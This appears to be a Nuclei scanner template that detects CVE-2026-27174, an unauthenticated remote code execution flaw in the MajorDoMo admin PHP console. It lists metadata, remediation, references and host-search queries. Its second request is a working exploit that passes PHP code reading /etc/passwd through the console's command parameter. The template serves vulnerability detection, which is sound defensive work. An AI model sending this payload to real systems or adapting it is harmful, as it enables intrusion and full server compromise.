id: CVE-2026-27174 info: name: MajorDoMo - Unauthenticated RCE author: 0x_Akoko severity: critical description: | MajorDoMo contains a remote code execution caused by an include order bug and lack of exit after redirect in admin panel's PHP console, letting unauthenticated attackers execute arbitrary PHP code via crafted GET requests. impact: | Unauthenticated attackers can execute arbitrary PHP code remotely, potentially leading to full system compromise. remediation: | Update to the latest version with the fix for the include order bug and proper exit after redirect. reference: - https://nvd.nist.gov/vuln/detail/CVE-2026-27174 - https://github.com/sergejey/majordomo/issues/1177 - https://chocapikk.com/posts/2026/majordomo-revisited - https://www.vulncheck.com/advisories/majordomo-unauthenticated-remote-code-execution-via-admin-console-eval classification: cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N cvss-score: 10.0 cve-id: CVE-2026-27174 epss-score: 0.85411 epss-percentile: 0.99387 cwe-id: CWE-94 cpe: cpe:2.3:a:sergejey:majordomo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: sergejey product: majordomo fofa-query: body="templates/application.html" shodan-query: http.html:"templates/application.html" tags: cve,cve2026,rce,majordomo,php,unauth,vkev flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "status_code == 200" - "contains_all(body, 'MajordomoSL', 'templates/application.html', 'majordomo')" condition: and internal: true - raw: - | GET /admin.php?ajax_panel=1&op=console&command=echo+file_get_contents%28%27%2Fetc%2Fpasswd%27%29%3B HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex part: body regex: - "root:[x*]:0:0:" - type: status status: - 200 # digest: 4a0a00473045022010c72f96cec44f13c5b0eb7a2ee8cf7b1926b18cb3eac1cf3f15cb7eaeaeac08022100e406479121def7b0ea480de83834ac471529e9ee449345b4e483e8711f33697f:922c64590222798bb761d5b6d8e72950